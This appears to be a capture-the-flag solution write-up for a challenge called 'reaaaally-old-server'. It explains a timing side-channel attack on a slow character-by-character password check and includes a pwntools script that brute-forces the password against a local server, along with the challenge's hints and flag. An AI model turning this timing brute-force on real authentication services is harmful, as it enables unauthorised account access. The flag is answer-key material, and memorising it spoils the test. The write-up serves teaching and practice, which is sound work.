write-ups-challenges-2023-2024/reaaaally-old-server/SOLUTION.md

54 lines
1.4 KiB
Markdown
Raw Permalink Normal View History

2023-11-28 15:24:59 +00:00
## Difficulty
85/100
tbh wss is
100/100 beter, ma ik wil het da nie geven cuz ik wil nie degene zijn
da zegt MIJN CHALLENGE IS DE MOEILIJKSTE dus ja we zullen zien na testing
## Category
Misc
## How To Solve
This is a timing comparison attack challenge. The password is compared
really slowly and by timing the duration of the answer, you can smart
bruteforce the password.
The duration of the comparison of one character is 0.1. This can be
timed by sending the alphabet letter by letter to the server and
timing the responses. The letter "s" would take longer to send back
because it is the first letter of the password.
Here is a solution script:
```py3
from pwn import *
def find(password, prevtime):
for c in string.ascii_lowercase:
new_pass = password + c
print(new_pass)
conn = remote("localhost", 3002)
conn.recv()
t = time.time()
conn.send((new_pass + "\n").encode())
ans = conn.recvline(timeout=prevtime + 1)
endtime = time.time() - t
print(endtime)
if endtime - prevtime > 0.08:
conn.close()
find(new_pass, endtime)
break
conn.close()
find("", 0)
```
## Hints
- I hope you payed attention to the course automata and computability!
- It might be useful information that my friend is German.
## Flag
IGCTF{THANKYOUALANTURINGITCOULDNOTHAVEBEENEASY}